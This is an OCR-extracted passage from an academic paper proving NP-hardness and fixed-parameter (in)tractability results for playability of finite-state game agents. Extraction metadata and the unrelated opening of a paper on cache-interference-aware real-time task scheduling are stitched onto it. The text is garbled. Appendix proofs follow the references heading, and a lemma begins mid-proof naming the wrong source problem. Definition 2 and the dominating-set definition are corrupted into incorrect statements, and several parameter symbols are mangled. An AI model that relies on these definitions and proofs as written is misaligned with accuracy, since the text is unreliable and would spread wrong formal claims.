$S_A$ should specify two types of characteristics: 1) Overall characteristics of agent-group and individual-agent structure; and 2) Required internal structures of individual agents. The first type of characteristics correspond to the AGENTS parameters in Table I while the second could consist of specifications of required states and transitions along the lines of the system described in Watson et al [7]. The above yields the following: **AFSM Playable Agent Generation (PAG)** **Input:** Item- and fact-sets $I$ and $F$, an AFSM-group specification $S_A$, initial player item- and fact-sets $I_p^0$ and $F_p^0$, goal item- and fact-sets $I_G$ and $F_G$, and a positive integer $t$. **Output:** An AFSM-group $A$ consistent with $S_A$ such that the player can obtain $I_G$ and $F_G$ by engaging in at most $t$ interactions with the agents in $A$, if such an $A$ exists, and special symbol $\bot$ otherwise. This informal version can be fully formalized relative to a particular format in which specifications are written. Consider the set of specification-formats in which one can create in time polynomial in $|A|$ a specification that can only be satisfied by a given AFSM-set $A$; let us call this set $S$. To see how the intractability results given in Sections III, V-A, and V-B apply to PAG, note the following – namely, any algorithm $a$ for a version of PAG formalized relative to any member of $S$ can be used to answer any instance of APE (given an instance $I$ of APE with agent-set $A$) for which $S_A$ generates $A$; return “No” for $I$ if $a$ run on $I$ returns $\bot$ and “Yes” otherwise. Hence, any intractability result (including all intractability results in Sections III, V-A, and V-B) that forbids the existence of a certain type of algorithm for APE also then forbids that type of algorithm for any version of PAG formalized relative to any member of $S$. Our lone tractability result for APE does not appear to apply in such a general manner to PAG; however it may hold relative to specific members of $S$. **D. Discussion** We have found that evaluating agent playability is $NP$-hard (Result A). This $NP$-hardness holds for a basic agent model and a minimal playability condition that a human player can attain a specified goal by interacting with the given group of agents, even when that group consists of a single agent; moreover, as pointed out in Section V-C, this also applies to plausible schemes for generating playable agents. Our results immediately imply that it is unlikely that deterministic polynomial-time methods exist for these problems. The scope of these results is actually broader still. It is widely believed that $P = BPP$ [24, Section 5.2] where $BPP$ is considered the most inclusive class of problems that can efficiently solved using probabilistic methods (in particular, methods whose probability of correctness can be efficiently boosted to be arbitrarily close to probability one). Hence, our results also imply that unless $P = NP$, there are no probabilistic polynomial-time methods which correctly evaluate or generate playable agent-groups with high probability for all inputs. This then constitutes the first proof that no currently-used method (including the automated search and simulated-play-based processes described in [1], [2] or evolutionary algorithms such as that employed in [7]) can guarantee both efficient and correct operation for all inputs for these problems. As described in Section IV, efficient correctness-guaranteed methods may yet exist relative to plausible restrictions on the input and output. To our knowledge, no such restrictions have been proposed in the literature for either agent playability evaluation or playable agent generation. It seems reasonable to conjecture that some restrictions relative to the parameters listed in Table I should render these problems tractable. However, no single one or indeed many possible combinations of these restrictions can yield tractability, even when the parameters involved are restricted to very small constants (Results B–F and Section V-C). The one exception that we have found to date (and only for agent playability evaluation) is that of simultaneously restricting $|A|$, $|I|$, and $t$ (Result G). Though this may initially seem of limited interest in that it overly restricts the form of games whose playability can be checked efficiently, it actually suggests several reasonable ways in which games can be decomposed into sub-games whose playability can be checked efficiently. For example, a long game could be decomposed into several shorter ones (restrict $t$). Alternatively, the game could be structured such that only a very small number of agents or player-agent interactions are necessary and/or relevant to achieving the goal (restrict $|A|$ and/or $|I|$); this could be done while preserving a larger game environment by embedding the goal-relevant set of agents and interactions within a goal-irrelevant set of agents and interactions, e.g., only a few shopkeepers, wizards, or travellers are worth talking to and only about specific matters. A valid objection to this lone tractability result is that the running time of the underlying algorithm is impractical. This is often true of the initial algorithms derived relative to a parameter-set. However, our result is important nonetheless because it establishes fixed-parameter tractability relative to a set of parameters which (by reasoning like that above) can be of small value in practice. Once this has been done, surprisingly effective parameterized algorithms can frequently be developed with both greatly diminished non-polynomial terms and polynomial terms that are quadratic and even linear in the input size (see [9], [21] and references). A final very important proviso is in order – namely, as illuminating as the results given here are in demonstrating basic forms of (in)tractability for the agent playability evaluation and playable agent generation problems, these results do not necessarily imply that methods currently being applied to evaluate or generate agents are impractical. Differing agent models, the particular situations in which these methods are being applied, and accepted standards by which method practicality is assessed may render the results given here irrelevant. For example, current methods may already be implicitly exploiting restrictions on the input and output such that both efficient and correct operation (or operation that is correct with probability very close to one) are guaranteed. That being said, not knowing the precise conditions under which such practicality holds could have very damaging consequences, e.g., drastically slowed gameplay and/or unplayable game content, for systems (in particular, real-time-adaptable systems) using such methods that stray outside these conditions. Given that (as noted earlier in Section I) playability and its efficient evaluation and enforcement are very important properties of game systems, the acquisition of such knowledge via a combination of rigorous empirical and theoretical analyses should be a priority. With respect to theoretical analyses, it is our hope that the techniques and results in this paper comprise a useful first step. VI. CONCLUSIONS We have presented a formal characterization of the problem of game agent playability evaluation relative to an augmented finite-state machine model of game agents. Our complexity analyses reveal that, while this problem is computationally intractable in general, there are conditions that render it tractable. Knowledge of this and other such conditions can be exploited in computer game design to create efficient playability-guaranteed content generation methods with respect to more complex and interesting gameplay involving player interactions with more socially realistic game agents. In future research, we plan to explore the computational consequences of additional types of restrictions on agent playability evaluation and playable agent design relative to both the agent-model described in this paper and more complex agent-models (e.g., agents that are truly autonomous rather than player-activated) as well as minimal and broader conceptions of playability. We will also build on previous work establishing the \( \text{NP} \)-hardness of evaluating the playability of and generating playable game levels by applying parameterized analysis to establish under which restrictions these problems can and cannot be solved efficiently. Finally, given work positing connections between human cognition and fixed-parameter tractability [19, 25], we will investigate the extent to which results such as those we have derived here can help in creating games whose level of difficulty not only is more appropriate to human players but can also be efficiently customized to the abilities of those players [2]. ACKNOWLEDGMENTS The authors would like to thank Rod Byrne, Andrew Vardy, and Wolfgang Banzhaf for encouraging them to embark on this research and two anonymous reviewers for comments that improved the presentation of this paper. TW was supported by NSERC Discovery Grant RGPIN 228104-2010 and SW was supported by NSERC Discovery Grant RGPIN 283304-2012 to Wolfgang Banzhaf and a doctoral award from the Dean of the School of Graduate Studies at MUN. REFERENCES interactions of the AFSM in Figure 1 with a human player are shown in Figure 2. With respect to the goal consisting of having the true amulet and knowing the wizard, the first and second interaction-sequences achieve this goal within 5 and 8 interactions, respectively, while the third interaction-sequence does not achieve the goal and moreover cannot be extended by any sequence of interactions to achieve the goal. APPENDIX B Proving Intractability Given some criterion of tractability like polynomial-time or fixed-parameter solvability, we can define the class $T$ of all computational problems that are tractable relative to that criterion. For example, $T$ could be the class $P$ of decision problems (see below) solvable in polynomial-time, or $FPT$, the class of parameterized problems that are fp-tractable. We can show that a particular problem is not in $T$ (and thus that this problem is intractable) by showing that this problem is at least as hard as the hardest problem in some class $C$ that properly includes (or is strongly conjectured to properly include) $T$. For example, $C$ could be $NP$, the class of decision problems whose candidate solutions can be verified in polynomial time, or a class of parameterized problems in the $W$-hierarchy $= \{W[1], W[2], \ldots, W[P], \ldots, XP\}$ (see [8] and [9], respectively, for details). We will focus here on reducibilities between pairs of decision problems, i.e., problems whose outputs are either “Yes” or “No”. The two types of reductions used in this paper are as follows. Definition 2: Given a pair $\Pi$, $\Pi’$ of decision problems, $\Pi$ polynomial-time many-one reduces to $\Pi$ if there is a polynomial-time computable function $f$ mapping instances $I$ of $\Pi$ to instances $f(I)$ of $\Pi’$ such that the answer to $f(I)$ is “Yes” if and only if the answer to $f(I)$ is “Yes”. Definition 3: Given a pair $\Pi$, $\Pi’$ of parameterized decision problems with parameters $p$ and $p’$, respectively, $\Pi$ fp-reduces to $\Pi$ if there is a function $f$ mapping instances $I = (x, p)$ of $\Pi$ to instances $I’ = (x’, p’)$ of $\Pi’$ such that (i) $f$ is computable in $g(p)|x|^\alpha$ time for some function $g()$ and constant $\alpha$, (ii) $p' = h(p)$ for some function $h()$, and (iii) the answer to $I$ is “Yes” if and only if the answer to $I’ = f(I)$ is “Yes”. A reducibility is appropriate for a tractability class $T$ whenever $\Pi$ reduces to $\Pi’$ and $\Pi’ \in T$ then $\Pi \in T$. We say that a problem $\Pi$ is $C$-hard for a class $C$ if every problem in $C$ reduces to $\Pi$. A $C$-hard problem is essentially as hard as the hardest problem in $C$. Reducibilities become particularly useful given the following easily-provable properties: 1) If $\Pi$ reduces to $\Pi’$ and $\Pi$ is $C$-hard then $\Pi’$ is $C$-hard. 2) If $\Pi$ is $C$-hard and $T \subseteq C$ then $\Pi \not\in T$, i.e., $\Pi$ is not tractable. 3) If $\Pi$ is $C$-hard and $T \subseteq C$ then $\Pi \not\in T$ unless $T = C$, i.e., $\Pi$ is not tractable unless $T = C$. The first and third properties are used below to show intractability relative to T-classes \( P \) and \( FPT \) and \( C \)-classes \( NP, W[1] \), and \( XP \). Note that these intractability results hold relative to the conjectures \( P \neq NP \) and \( FPT \neq W[1] \) which, though not proved, are commonly accepted as true within the Computer Science community (see [8], [9], [20] for details). **APPENDIX C** **PROOFS OF RESULTS** All of our intractability results will be derived using reductions from the following \( NP \)-hard decision problems: **NONDETERMINISTIC TURING MACHINE COMPUTATION** *Input*: A single-tape, single-head nondeterministic Turing machine \( M = \langle \Sigma, Q, \Delta, s, F \rangle \) (where \( \Sigma \) is an alphabet, \( Q \) is a set of internal states, \( \Delta \subseteq Q \times \Sigma \times Q \) is a set of transitions, \( s \in Q \) is the start state, and \( f \in Q \) is the final state), a word \( x \in \Sigma^* \), and a positive integer \( k \). *Question*: Is there a computation of \( M \) on \( x \) starting in \( s \) that reaches some final state \( f \in F \) in at most \( k \) steps? **DOMINATING SET [8, Problem GT2]** *Input*: An undirected graph \( G = (V, E) \) and an integer \( k \). *Question*: Does \( G \) contain a dominating set of size \( \leq k \), i.e., is there a subset \( V' \subseteq V \) with \( |V'| \geq k \), such that for all \( v \in V' \) or there is a \( v' \in V' \) such that \((v, v') \in E\)? **CLIQUE [8, Problem GT19]** *Input*: An undirected graph \( G = (V, E) \) and an integer \( k \). *Question*: Does \( G \) contain a clique of size \( \geq k \), i.e., is there a subset \( V' \subseteq V \) with \( |V'| \geq k \), such that for all \( v, v' \in V' \), \((v, v') \in E\)? and \( k \) time/tape square position/tape square contents (TTT) facts \( t/s/1 \leq i \leq k \) and \( s \in \Sigma \). Each write transition \((q, x, q') \) in \( M \) is encoded by \( k \times k \times \Sigma \) agents each consisting of states \( q_0 \) and \( q_1 \) with a single transition that is enabled by the time-fact \( t \), time/head position fact \( i/s \) and TTT fact \( t/s/q \) and returns the corresponding facts \((t+1), (t+1)/i, q', (t+1)/s/0 \leq t < k, 1 \leq i \leq k, \) and \( s' \in \Sigma \). Analogous sets of agents are constructed for all left-move and right-move transitions in \( M \). The following four sets of two-state single-transition agents are also required: 1. A set of agents that individually enable on time-fact \( t \) and TTT fact \((t+1)/i/s \) and return the TTT fact \( t/i/s \) for \( 1 \leq t, i \leq k \) and \( s \in \Sigma \) (i.e., bring forward in time all tape-square contents not updated by a write-transition at time \((t-1)\); 2. A set of agents that individually enable on time/state fact \( t/f \) and return time/state fact \((t+1)/f \) for \( 1 \leq t < k \) and \( f \in F \) (i.e., bring forward in time any final state reached at or before time \((t-1)\); 3. A set of agents that individually enable on time/fact \( k \) and TTT fact \( k/i/s \) and return TTT fact \( k/i/s'' \) for some \( s'' \notin \Sigma \) (i.e., erase the contents of the tape at time \( k \)); and 4. A set of agents that enable on time/fact \( k \), time/state fact \( t/f \), and TTT facts \( k/1/s'', k/2/s'', \ldots, k/k/s'' \) and return completion-fact \( c \) for \( f \in F \). Each agent starts with no items and the facts it returns and the player starts with no items and the facts corresponding to an initial state \( q_0 \), head position 1, and \( x \) on the first \(|x| \) squares of the tape and \( s'' \) in the remaining \( k-|x| \) squares. Finally, set the goal to \( c \) and \( t = (k+1)k+1 \). Note that the instance of APE described above can be constructed in time that is polynomial with respect to \( k \) and the size of the given instance of DOMINATING SET (this is necessary as \( k \) is stored in binary in the given instance and the value of \( k \) is exponential in \( \log_2 k \)). If there is a transition-sequence of length at most \( k \) for \( M \) computing on \( x \) from \( s \) that reaches a final state, there is a sequence of exactly \( t \) agent-player interactions that will achieve the goal (as all tape-squares must be updated to \( k \) and be available for subsequent erasure in order to obtain goal-fact \( c \)). Conversely, if there is an interaction-sequence of length \( t \) that achieves the goal, there must be embedded in this sequence a subsequence of interactions of length \( \leq k \) that allowed time/state fact \( k/f \) to be derived from time/state fact \( 0/q_0 \), time/head position fact \( 0/1 \), and the TTT facts encoding of \( x \) on the tape, which corresponds to a sequence \( k \) transitions that allow \( M \) computing on \( x \) from \( s \) to reach a final state. To complete the proof, note that in the constructed instance of APE, \( i_A = 0, f_A = 3, i_f = 0, |Q| = 2, |I| = 1, i_P = 0, i_G = 0, f_G = 1, f_I = k + 2, f_P = k(k+3) + k + 1, \) and \( t = (k+1)k+1 \). Lemma 4: DOMINATING SET polynomial-time many-one reduces to APE such that in the constructed instance of APE, \( i_A = i_I = 1, i_G = 0, f_G = 1, \) and \( |A| \) and \( t \) are both a function of \( k \) in the given instance of DOMINATING SET. Proof: Given an instance \((G = (V, E), k)\) of DOMINATING SET, the constructed instance of APE consists of \( k \) identical agents plus an additional final agent. Each of the identical agents consists of an initial state \( q_0 \) and a transition from \( q_0 \) to each of the \(|V| \) states \( q_i, 1 \leq i \leq |V| \), in which the offered item \( v_i \) is exchanged for the set of facts corresponding to all vertices in the neighbourhood of \( v_i \) (including \( v_i \) itself) in \( G \). The final agent consists of two states \( q_0 \) and \( q_1 \) and a transition from \( q_0 \) to \( q_1 \) that exchanges the complete set of vertex-facts for \( G \) for a completion-fact. Each identical agent starts with no items and the complete set of vertex-facts for \( G \), the final agent starts with no items and the completion-fact, and the player starts with the complete set of vertex-items for \( G \) and no facts. Finally, the goal is the completion-fact and \( t = k + 1 \). Note that the instance of APE described above can be constructed in time polynomial in the size of the given instance of DOMINATING SET. If there is a dominating set of size at most \( k \) in the given instance of DOMINATING SET, the player can exchange the vertices in that dominating set with at most \( k \) of the identical agents to obtain the complete set of vertex-facts for \( G \) and hence achieve the goal. Conversely, as the player can interact with each of the identical agents at most once to trade a vertex-item for its associated neighbourhood-set of vertex-facts in \( G \), any set of at most \( k + 1 \) interactions between the player and the agents that achieves the goal in the constructed instance of APE must correspond to a set of at most \( k \) vertices that form a dominating set in \( G \). To complete the proof, note that in the constructed instance of APE, \( i_A = i_I = f_G = 1, i_G = 0, \) and \( |A| = t = k + 1 \). Lemma 5: DOMINATING SET polynomial-time many-one reduces to APE such that in the constructed instance of APE, \( i_A = i_I = 1, f_I = |I| = 2, i_G = 0, \) and \( f_G = 1, \) and \( |A| \) is a function of \( k \) in the given instance of DOMINATING SET. Proof (sketch): Modify the instance of APE constructed in Lemma 4 as follows: (1) Replace all \(|V| \) transitions in each identical agent with a transition-tree rooted at \( q_0 \) consisting of a \(|V|\)-length “spine” of transitions, each of which is enabled by a move-fact, with \(|V| \) branches off this spine, where each branch is a \(|V|\)-length chain of transitions which are initially enabled by item \( v_i \) and deliver (one at a time) the vertex-facts corresponding to the neighbourhood vertex-facts for \( v_i \) before terminating at \( q_1 \); (2) Replace the single transition in the final agent with a \(|V|\)-length chain of transitions that are enabled by the individual vertex-facts in \( G \) before terminating in \( q_1 \) and the final exchange of the completion-fact; and (3) make the move fact the initial fact-set for the player; and (4) set \( t = (k \times 2|V|) + |V| = (2k+1)|V| \). The proof of correctness is a modification of that given in Lemma 4. Note that in the instance of APE described above, \( i_A = i_I = f_G = 1, f_I = |I| = 2, i_G = 0, \) and \( |A| = k + 1 \). Lemma 6: CLIQUE polynomial-time many-one reduces to APE such that in the constructed instance of APE, \( i_A = i_I = 1, i_G = 0, f_G = 1, \) and \( |A|, f_P, \) and \( t \) are all functions of \( k \) in the given instance of CLIQUE. Proof: Given an instance $<G = (V, E), k>$ of CLIQUE, construct an instance of APE consisting of two groups of $k$ and $k(k - 1)/2$ agents, respectively. The agents in the first group are the vertex-selection agents from Lemma 4 modified so that agent $i$ exchanges vertex-item $v$ for vertex-position fact $v/i$. Each of the agents in the second group corresponds to a distinct pair $i, j$, $1 \leq i < j \leq k$ which checks if the vertices selected in positions $i$ and $j$ have an edge between them in $G$. For the $i$th pair, $1 \leq i \leq k(k - 1)/2$, this is done using two states $q_0$ and $q_1$ and $2|E|$ transition between $q_0$ and $q_1$, which, for each edge $(u, v) \in E$, trade items $u/i, v/j (v/i, u/j)$ and fact $echk_{i}^{u}/v(j)$ for items $u/i, v/j (v/i, u/j)$ and fact $echk_{i}^{v}$, respectively. Each vertex-selection agent $i$ starts with no items and the entire vertex/position $i$-fact-set, each edge-check agent $l$ starts with no items and edge-check fact $ech{k}$, and the player starts with the entire vertex-item-set for $G$ and edge-check fact $ech{k}$. Finally, the goal is $c_{k(k-1)/2}$ and $t = k + k(k - 1)/2$. Note that the instance of APE described above can be constructed in time polynomial in the size of the given instance of CLIQUE. If there is a clique of size $k$ in the given instance of CLIQUE, the player can exchange the vertices in that clique with the vertex/position agents in any order to obtain a “sequence” of vertex/position facts that will satisfy the edge-check agents and hence achieve the goal. Conversely, as the player can interact with each of the vertex/position agents at most once to trade a vertex-item for its associated vertex/position fact, any set of at most $k + k(k - 1)/2$ interactions between the player and the agents that achieves the goal in the constructed instance of APE must correspond to a set of $k$ vertices that form a clique in $G$. To complete the proof, note that in the constructed instance of APE, $i_A = 1, i_t = f_t = 2, i_G = 0, f_G = 1$, and $|A| = k + k(k - 1)/2, f_P = k(k - 1)/2 + 1, t = k + k(k - 1)/2$. Lemma 7: CLIQUE polynomial-time many-one reduces to APE such that in the constructed instance of APE, $|A| = 1, i_t = 1, i_t = f_t = 2, i_0 = 1, f_0 = 1$, and $|Q|, f_P, t$ are all functions of $k$ in the given instance of CLIQUE. Proof (sketch): Note that all of the agents in the reduction in Lemma 6 can be chained together in a single agent consisting of a chain of $1 + k + k(k - 1)/2$ states, and that all edge-check facts except the last can be eliminated as they are no longer necessary, e.g., the state $q_1$ for what was originally the $k(k - 1)/2st$ edge-check agent can only be reached if all other edge-checks are satisfied. The goal and value of $t$ are unchanged. The proof of correctness of this reduction is a modification of that given in Lemma 6. Note that in the instance of APE described above, $|A| = 1, i_t = 1, f_t = 2, i_G = 0, f_G = 1$, $|Q| = 1 + k + k(k - 1)/2, f_P = k$, and $t = k + k(k - 1)/2$. Observe that setting $t$ to any specified value is actually unnecessary for the reductions in Lemmas 3 – 7 to work. Result A APE is NP-hard when $|A| = 1$. Proof: Follows from the NP-hardness of CLIQUE and the reduction in Lemma 7. Result B APE is fp-intractable for the parameter-set \{\$i_A, f_A, i_t, f_t, |A|, |P|, |P|, |G|, f_G\}. Proof: Follows from the $W[1]$-hardness of NTMC for parameter-set \{\$k\} \cite{26} and the reductions from NTMC to APE given in Lemma 3. Result C APE is fp-intractable for the parameter-set \{\$|A|, i_A, i_t, f_t, t, i_G, f_G\}. Proof: Follows from the $W[1]$-hardness of DOMINATING SET for parameter-set \{\$k\} \cite{9} and the reductions from DOMINATING SET to APE given in Lemma 4. Result D APE is fp-intractable for the parameter-set \{\$|A|, i_A, i_t, f_t, |I|, i_G, f_G\}. Proof: Follows from the $W[1]$-hardness of DOMINATING SET for parameter-set \{\$k\} \cite{9} and the reductions from DOMINATING SET to APE given in Lemma 5. Result E APE is fp-intractable for the parameter-set \{\$|A|, i_A, i_t, f_t, f_P, t, i_G, f_G\}. Proof: Follows from the $W[1]$-hardness of CLIQUE for parameter-set \{\$k\} \cite{9} and the reductions from CLIQUE to APE given in Lemma 6. Result F APE is fp-intractable for the parameter-set \{\$|A|, i_t, f_t, |Q|, f_P, t, i_G, f_G\}. Proof: Follows from the $W[1]$-hardness of CLIQUE for parameter-set \{\$k\} \cite{9} and the reductions from CLIQUE to APE given in Lemma 7. Result G APE is fp-tractable for the parameter-set \$|A|, |I|, t$. Proof: Consider the game space search tree whose nodes encode the current item- and fact-sets of each agent and the player as well as the current state of each agent. Observe that there are at most $|A| \times |I|$ possibilities for interactions relative to each node (as each agent’s current state has at most $|I|$ enabled transitions outwards from that state). As we require that the goal be reachable within $t$ agent-player interactions, the tree has at most $(|A| \times |I|)^t$ nodes that must be considered. As each node can be generated and evaluated in time polynomial in the size of the given instance of APE, the above is an algorithm for APE whose runtime is fp-tractable for parameter-set \$|A|, |I|, t$.
{"Source-Url": "http://web.cs.mun.ca/~harold/Courses/Old/CS690A.F15/Diary/paperIEEE.pdf", "len_cl100k_base": 11345, "olmocr-version": "0.1.49", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 44175, "total-output-tokens": 13339, "length": "2e13", "weborganizer": {"__label__adult": 0.0015163421630859375, "__label__art_design": 0.001190185546875, "__label__crime_law": 0.002349853515625, "__label__education_jobs": 0.00518798828125, "__label__entertainment": 0.0006499290466308594, "__label__fashion_beauty": 0.0009708404541015624, "__label__finance_business": 0.0012054443359375, "__label__food_dining": 0.0021419525146484375, "__label__games": 0.1163330078125, "__label__hardware": 0.00335693359375, "__label__health": 0.0030803680419921875, "__label__history": 0.001850128173828125, "__label__home_hobbies": 0.00045943260192871094, "__label__industrial": 0.00176239013671875, "__label__literature": 0.0019054412841796875, "__label__politics": 0.0013446807861328125, "__label__religion": 0.0017824172973632812, "__label__science_tech": 0.30517578125, "__label__social_life": 0.000286102294921875, "__label__software": 0.00946807861328125, "__label__software_dev": 0.53369140625, "__label__sports_fitness": 0.00171661376953125, "__label__transportation": 0.00171661376953125, "__label__travel": 0.0007100105285644531}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 49155, 0.01675]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 49155, 0.35196]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 49155, 0.89613]], "google_gemma-3-12b-it_contains_pii": [[0, 5289, false], [5289, 9349, null], [9349, 15210, null], [15210, 18622, null], [18622, 25007, null], [25007, 31924, null], [31924, 34963, null], [34963, 36755, null], [36755, 43867, null], [43867, 49155, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5289, true], [5289, 9349, null], [9349, 15210, null], [15210, 18622, null], [18622, 25007, null], [25007, 31924, null], [31924, 34963, null], [34963, 36755, null], [36755, 43867, null], [43867, 49155, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 49155, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 49155, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 49155, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 49155, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 49155, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 49155, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 49155, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 49155, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 49155, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 49155, null]], "pdf_page_numbers": [[0, 5289, 1], [5289, 9349, 2], [9349, 15210, 3], [15210, 18622, 4], [18622, 25007, 5], [25007, 31924, 6], [31924, 34963, 7], [34963, 36755, 8], [36755, 43867, 9], [43867, 49155, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 49155, 0.0]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
aaf22d8c4c08b8ada917f2020b5cd7ce70295d8f
CITTA: Cache Interference-Aware Task Partitioning for Real-Time Multi-core Systems Xiao, J.; Pimentel, A.D. DOI 10.1145/3372799.3394367 Publication date 2020 Document Version Final published version Published in LCTES '20 License Article 25fa Dutch Copyright Act Citation for published version (APA): CITTA: Cache Interference-aware Task Partitioning for Real-time Multi-core Systems Jun Xiao University of Amsterdam Amsterdam, Netherlands J.Xiao@uva.nl Andy D. Pimentel University of Amsterdam Amsterdam, Netherlands A.D.Pimentel@uva.nl Abstract Shared caches in multi-core processors introduce serious difficulties in providing guarantees on the real-time properties of embedded software due to the interaction and the resulting contention in the shared caches. Prior work has studied the schedulability analysis of global scheduling for real-time multi-core systems with shared caches. This paper considers another common scheduling paradigm: partitioned scheduling in the presence of shared cache interference. To achieve this, we propose CITTA, a cache-interference aware task partitioning algorithm. An integer programming formulation is constructed to calculate the upper bound on cache interference exhibited by a task, which is required by CITTA. We conduct schedulability analysis of CITTA and formally prove its correctness. A set of experiments is performed to evaluate the schedulability performance of CITTA against global EDF scheduling over randomly generated tasksets. Our empirical evaluations show that CITTA outperforms global EDF scheduling in terms of task sets deemed schedulable. CCS Concepts → Computer systems organization → Embedded software. Keywords Shared caches, Partitioned scheduling, Schedulability analysis, Real-time systems ACM Reference Format: 1 Introduction and Motivation Caches are common on multi-core systems as they can efficiently bridge the performance gap between memory and processor speeds. The last-level caches are usually shared by cores to improve utilization. However, this brings major difficulties in providing guarantees on real-time properties of embedded software due to the interaction and the resulting contention in a shared cache. On a multi-core processor with shared caches, a real-time task may suffer from two different kinds of cache interferences [21], which severely degrade the timing predictability of multi-core systems. The first is called intra-core cache interference, which occurs within a core, when a task is preempted and its data is evicted from the cache by other real-time tasks. The second is inter-core cache interference, which happens when tasks executing on different cores access the shared cache simultaneously. In this work, we consider non-preemptive task systems, which means that intra-core cache interference is avoided since no preemption is possible during task execution. We therefore focus on inter-core cache interference. It is necessary to conduct schedulability analysis when designing hard real-time application systems executing on multi-core platforms with shared caches, as those systems cannot afford to miss deadlines and hence demand timing predictability. Any schedulability analysis requires knowledge about the Worst-Case Execution Time (WCET) of real-time tasks. However, as pointed out in [28], it is extremely difficult to predict the cache behavior to accurately obtain the WCET of a real-time task considering cache interference since different cache behaviors (cache hit or miss) will result in different execution times of each instruction. In this paper, we assume that a task’s WCET itself does not account for shared cache interference but, instead, we determine this interference explicitly (as will be explained later on). Hardy and Puaut [18] present such an approach to derive a task’s WCET without considering shared cache interference. On multi-core systems, two paradigms are widely used for scheduling real-time tasks: global and partitioned (semi-partitioned) scheduling. For global scheduling, a job is allowed to execute on any core. In partitioned scheduling, on the other hand, tasks are statically allocated to processor cores, i.e., each task is assigned to a core and is always executed on that particular core. Although the partitioned approaches cannot exploit all unused processing capacity since a bin-packing-like problem needs to be solved to assign tasks to cores, it offers lower runtime overheads and provides consistently good empirical performance at high utilizations [6]. Furthermore, taking the shared cache interference into account, partitioned approaches can achieve better schedulability than global scheduling. We provide a simple example to illustrate this. Consider three tasks $\tau_1$, $\tau_2$ and $\tau_3$ with the same period and relative deadline of 7, the WCETs of $\tau_1$, $\tau_2$ and $\tau_3$ are 3, 3 and 2, respectively. The execution platform is a processor with 2 cores including a last-level shared cache. If $\tau_1$ and $\tau_2$ run concurrently, we assume that the maximum cache interference exhibited by $\tau_1$ and $\tau_2$ is 3. We also assume that $\tau_3$ has no cache interference with $\tau_1$ and $\tau_2$. It is impossible to conclude that this taskset is schedulable under global scheduling. Figure 1 shows a case where $\tau_3$ misses its deadline. At time $t = 0$, tasks $\tau_1$ and $\tau_2$ are scheduled to execute on the two cores. In the figure, the black area of a cumulative length of 3 denotes the WCET, and the hatched area of a cumulative length of 3 represents the extra execution time due to the cache interference. At $t = 6$, $\tau_1$ and $\tau_2$ both finish their executions, after which $\tau_3$ starts its execution. At $t = 7$, $\tau_3$ misses its deadline. Similarly, consider another case: at $t = 0$, $\tau_3$ and $\tau_1$ (or $\tau_2$) are scheduled, at $t = 2$, $\tau_3$ finishes and $\tau_2$ (or $\tau_1$) starts its execution. Since cache interference is counted per job [31], in the worst case, the cache interference exhibited by $\tau_2$ (or $\tau_1$) can still be 3 even though the duration of co-running $\tau_2$ (or $\tau_1$) and $\tau_1$ (or $\tau_2$) is less than in the previous case. Due to the cache interference, $\tau_2$ (or $\tau_1$) could finish its execution at $t = 8$, leading to a deadline miss for $\tau_2$ (or $\tau_1$). ![Figure 1. Case where $\tau_3$ misses its deadline if $\tau_1$, $\tau_2$ and $\tau_3$ are scheduled globally.](image) However, the taskset is schedulable under the partitioned scheduling. Consider, e.g., the partitioning scheme in which $\tau_1$ and $\tau_2$ are assigned to core 1, and task $\tau_3$ is assigned to core 2. Since $\tau_1$ and $\tau_2$ are assigned to the same core, they cannot run simultaneously. As no cache interference can occur during task execution, it can be verified that every task meets its deadline. **Contributions.** Motivated by the above example, in this work, we propose a novel cache interference-aware task partitioning algorithm, called CITTA. To the best of our knowledge, this is the first work on partitioned scheduling for real-time multi-core systems, accounting for shared cache interference. An integer programming formulation is constructed to calculate the upper bound on cache interference exhibited by a task, which is required by CITTA. We conduct schedulability analysis of CITTA and formally prove its correctness. A set of experiments is performed to evaluate the schedulability performance of CITTA against global EDF scheduling over randomly generated tasksets. Our empirical evaluations show that CITTA outperforms global EDF scheduling in terms of tasksets deemed schedulable. The rest of the paper is organized as follows. Section 2 gives an overview of related work. The system model and some other prerequisites for this paper are described in Section 3. Section 4 describes the proposed CITTA, where we also detail the computation of the inter-core cache interference and schedulability analysis of CITTA. Section 5 presents the experimental results, after which Section 6 concludes the paper. ## 2 Related work ### WCET estimation. For hard real-time systems, it is essential to obtain each real-time task’s WCET, which provides the basis for the schedulability analysis. WCET analysis has been actively investigated in the last two decades, of which an excellent overview can be found in [30]. There are well-developed techniques to estimate a real-time tasks’ WCET for single processor systems. Unfortunately, the existing techniques for single processor platforms are not applicable to multi-core systems with shared caches. Only a few methods have been developed to estimate task WCETs for multi-core systems with shared caches [17, 23, 36]. In almost all those works, due to the assumption that cache interferences can occur at any program point, WCET analysis will be extremely pessimistic, especially when the system contains many cores and tasks. An overestimated WCET is not useful as it degrades system schedulability. **Shared cache interference.** Since shared caches make it difficult to accurately estimate the WCET of tasks, many researchers have recognized and studied the problem of cache interference in order to use shared caches in a predictable manner. Cache partitioning is a successful and widely-used approach to address contention for shared caches in (real-time) multi-core applications. There are two cache partitioning methods: software-based and hardware-based techniques [15]. The most common software-based cache partitioning technique is page coloring [24, 